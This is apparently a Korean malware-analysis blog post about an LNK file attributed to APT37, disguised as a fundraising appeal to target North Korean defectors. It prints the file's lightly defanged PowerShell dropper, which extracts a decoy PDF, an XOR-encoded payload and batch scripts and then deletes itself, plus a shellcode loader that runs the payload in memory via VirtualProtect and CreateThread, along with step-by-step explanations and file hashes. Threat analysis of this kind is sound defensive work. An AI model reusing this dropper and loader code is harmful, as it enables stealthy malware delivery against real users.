탈북자 분들을 노리는 북한 해킹 단체 APT37(Reaper)에 만든 악성코드-김x민대표님모금캠페인.lnk(2024.10.31)

오늘은 탈북자 분들을 노리는 북한 해킹 단체 APT37(Reaper)에 만든 악성코드에서 만든 김x민대표님모금캠페인.lnk(2024.10.31)에 대해 글을 적어 보겠습니다. 해당 악성코드는 자유북한방송의 대표 김x민 대표님 모금 캠페인으로 위장해서 유포했던 악성코드입니다.
일단 해당 대표님이 뇌종양이 발견되었던 것을 가지고 마치 탈북자 단체에서 성금을 모으려고 만든 문서로 돼 있지만 실제로는 악성코드입니다.
파일명:김X민대표님모금캠페인.lnk
사이즈:222 MB
MD5:144928fc87e1d50f5ed162bb1651ab24
SHA-1:e917166ed0096688994709acb94233ba3f3be39b
SHA-256:c045b9da0456430268861da18735f7e8ebb2d1df771ca803a2535bdc8f7a6e89

악성코드 에 포함된 PowerShell 코드

악성코드에 포함된 PowerShell 코드

StringData
{
 namestring: 
 relativepath: not present
 workingdir: not present
 commandlinearguments: /k for /f "t(o)kens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerSh
 e(l)l\v1.0\*rshell(.)exe /s /b /od') do c(a)ll %a "$(d)irPath = Get-Location; if($dirP
 ath -Match 'Sys(t)em32' -or $dirPath -Match 'Program Files') {($)d(i)rPath = '%temp%'}
 ;$exs=@('(.)lnk');$lnkPath = Get-ChildItem -Path $dirP(a)th -Recur(s)e *.* -File | w(h)er
 e {$_.extension -in $exs} | where-object {$_.length -eq 0x0(D)DA0CDE} | Select(-)Object
 -ExpandPro(p)erty FullName ;$ln(k)File=New-Ob(j)ect System.IO.Fi(l)eStream($lnkPath,
 [System.IO.FileMode]::Open, [System(.)IO(.)FileAccess]::R(e)ad);$lnkFile(.)Seek(0x000
 0111A, [System(.)IO(.)SeekOrigin]::Begin);$pdfFile=Ne(w)-Object byte[] 0x0006A93F;$ln
 kFile(.)Read($pdfFile, 0, 0x0(0)06A93F);$pdfPath = $lnkPath.replace('.lnk'(,)'.pdf');
 sc $pdfPath $(p)dfFile -Encoding Byte;& $pdfPath;$lnk(F)ile.Seek(0x00(0)6BA59,[System
 .IO.SeekO(r)igin]::Begin);$exeFile=New-Object byte[] 0(x)000D9190;$lnkFile(.)Read($ex
 eFile, 0, 0x000D9190);$exePath=$env:temp+'\caption(.)dat';sc $exePath $e(x)eFile -Enc
 oding Byte;$lnkFile.Seek(0x0(0)144BE9,[System.IO.SeekOrigin]::Begin);$stringByte = New-
 Object byte[] 0x00000(6)36;$lnkFile.Read($stringByte, 0, 0x00000636); $batStrPath = $en
 v:temp+'\'(+)'elephant(.)dat';$string = [System.Text.Encoding]::UTF8.GetString($s(t)rin
 gByte);$stri(n)g | Out-File -FilePath $(b)atStrPath -Encoding ascii;$lnkFile(.)Seek(0x0
 014521F,[System(.)IO(.)SeekOrigin]::Begin);$batByte = New-Object byte[] 0x0000014(7);$l
 nkFile.Read($batByte, 0, 0x00000147);$executePath = $env:temp+'\'+'shark'+'e.b'(+)'a'+'
 t'; Write-Host $executePath; Write-Host $batStrPath; $bastStr(i)ng = [System.Text.Encod
 ing]::(U)TF8.GetString($bat(B)yte);$bastString | Out-File -FilePath $executePath -Encod
 ing ascii; &$exe(c)utePath; $lnkFile.Close(); remove-item -path $l(n)kPath -force; "&& 
 exit
 iconlocation: C:\Progra(m) Files (x86)\Microsoft\Edge\Application\msedge(.)exe
}

악성코드 분석

1.초기 명령 실행
/s /b /od 옵션은 하위 디렉터리 포함돼 있으며 전체 경로 출력, 수정일 순 정렬 (최신순)
2.경로 및 필터 처리
System32 또는 Program Files 내에서 실행되면 %TEMP%로 이동
3.LNK 파일 검색 및 필터링
.lnk 확장자이며 정확히 0x0DDA0CDE 크기를 가진 파일을 검색
4. 파일 분리 및 쓰기
LNK 내부 오프셋 0x111A부터 PDF 데이터 추출->실행 가능한 PDF(미끼 파일)
5.EXE 페이로드 추출
마찬가지로 LNK 내부에서 EXE 페이로드 추출->caption.dat 으로 저장
6.문자열 및 BAT 파일 생성
문자열과 추가 BAT 명령어 생성->elephant.dat,sharke.bat에 저장 및 실행
요약
dir 명령어를 통해 특정 파일명 패턴 (rshell.exe)을 가진 실행파일을 C:\Windows\SysWow64\WindowsPowerShell\v1.0 경로에서 탐색
해당 파일을 call로 실행하며 PowerShell 명령어 전달
현재 디렉터리를 Get-Location으로 얻고 특정 조건(System32, Program Files)이면 %TEMP%로 변경
.lnk 확장자 파일들을 재귀적으로 탐색하면서 파일 크기가 정확히 0x0DDA0CDE (233,107,934 bytes)인 파일을 필터링
해당 파일로부터 다음 파일들 추출
PDF 형태의 바이너리 추출 (0x0000111A~크기 0x6A93F)
EXE 형태의 페이로드 추출 (0x0006BA59~크기 0xD9190)
문자열 데이터 (0x00144BE9~크기 0x636)
BAT 스크립트 바이너리 (0x0014521F~크기 0x147) 를 추출
각각.pdf,.dat,.bat 등으로 저장하고 실행하며 악의적인 목적을 가지고 행동
실행된 .lnk 파일은 즉시 삭제

악성코드가 생성한 PDF 내용

PDF 파일 내용이 실행되면 윤석열 전 대통령과 국민훈장인 동백장을 받은 사진이 있고 내용을 확인할 수가 있는데 참~정성이 부족을 해서 사진은 영~화질이 떨어지는 것을 확인할 수가 있습니다.

elephant.dat 내용

elephant.dat 내용

$exePath=$env:temp(+)'\caption(.)dat';$exeFile = Ge(t)-Content -pa(t)h $exeP(a)th
-encodin(g) byte;$le(n)=$exeFile(.)count;$(n)ew(E)xeFile = New-Ob(j)ect Byte[] $le
n;($)xK='d';for($(i)=0;$i -lt $len;$(i)++) {$new(E)xeFile[$i] = $exe(F)ile[$i] -bxor $x
k[0]}; [Net.Se(r)vicePointManager]::Secur(i)tyProtocol = [Enum]::To(O)bject([Net(.)Sec
(u)rityProto(c)olType], 30(7)2);$k(1)123 = [System(.)Text(.)Encoding]::UTF8(.)GetStri
ng(34) + 'kernel32(.)dll' + [System.T(e)xt.Encoding]::UTF8(.)GetString(34);$(a)90234s 
= '[DllIm(p)ort(' + $k1123 (+) ')]public sta(t)ic e(x)tern Int(P)tr Globa(l)Alloc(uin
t b,(u)int c);';$b = Add-T(y)pe -Member(D)efinition $a90(2)34s  -Name 'AAA' -PassThr
(u);$d3s9sdf = '[D(l)lImport(' + ($)k1123 + ')]public stat(i)c extern bool Vir(t)ual
Protect(I(n)tPtr a,ui(n)t b,(u)int c,(o)ut IntPt(r) d);';$a90234sb = Add-Type -MemberDefi
nition $d3s9sdf -Name 'AAB' -PassThru;$b3s9s03sfse = '[DllImport(' + $k1123 + ')]public st
atic extern IntPtr CreateThre(a)d(IntPtr a,uin(t) b,IntPtr c,I(n)tPtr d,uint e(,)IntPtr f)
;';$cake3(s)(d)23 = Add(-)Type -Membe(r)Definition $b3s9(s)03sfse  -Nam(e) 'BBB' -PassThr(
u);$dt(t)(s)9s03sd23 = '[Dll(I)mport(' + $(k)1123 + ')]publ(i)c static exter(n) IntPtr Wai
(t)ForSingleObject((I)ntPtr a,uint b);';$fried3sd23 = Add-Type -MemberDefinition $dtts9s03
sd23 -Name 'DDD' -PassThru;$byteCount = $newExeFile.Length;$buffer = $b::GlobalAlloc(0x004
0, $byteC(o)unt (+) 0(x)100);$old = 0;$a9023(4)sb::Virtual(P)rotect($buff(e)r, $b(y)teCo
(u)nt + 0x(1)00, 0(x)40, [ref(])$old); for($(i) = 0;$i -lt $byteCo(u)nt;$i++) { [System
(.)Runtime(.)InteropServices(.)Marshal]::Writ(e)Byte($buffer, $i, $ne(w)E(x)eFile[$i])
; };$handle = $cake3sd23::Create(T)hread(0, 0, $buffer, 0, 0, 0);$frie(d)3sd23::WaitFo
rSingle(O)bject($handl
e, 500 * 1000);

악성코드 분석

1.XOR 복호화된 실행 파일 로드
%TEMP%\caption.dat 파일에서 바이트 단위로 데이터를 읽어옴
XOR 키 d (0x64)를 사용을 해서 복호화
caption.dat 은 XOR으로 인코딩된 실행파일
2. 보안 우회 및.NET DllImport
TLS 1.2 설정->네트워크 통신 준비 구조
3.P/Invoke 사용을 위한 kernel32.dll 함수 정의
[kernel32.dll] 문자열 생성
Windows API 사용을 해서.NET 환경에서 직접 호출하기 위한 DllImport 정의
4. PE 파일을 메모리에 직접 로드 및 실행
GlobalAlloc:실행 가능한 메모리 영역 할당 (0x0040->GMEM_MOVEABLE)
VirtualProtect:할당한 메모리의 보호 속성을 PAGE_EXECUTE_READWRITE (0x40) 설정

5.코드 또는 EXE 바이너리를 메모리에 Write
바이너리 데이터를 메모리 주소에 직접 복사
Reflective Loader or Shellcode Injection 기법 사용
6. 스레드 생성 및 실행 대기
CreateThread 를 통해 바이너리 시작점부터 실행
WaitForSingleObject 로 스레드 종료까지 500초 대기
caption.dat 파일에서 바이너리 데이터를 읽어 옴
XOR 복호화 수행 (단일 키: d)
복호화된 바이너리를 메모리에 할당
kernel32.dll 함수들을 통해 메모리 보호 설정 및 실행
CreateThread->WaitForSingleObject->셸 코드 실행
이렇게 탈북자 분들을 직접 공격하기 위한 악성코드인 김 x 민 대표님 모금캠페인. lnk(2024.10.31) 에 대해 알아보았습니다.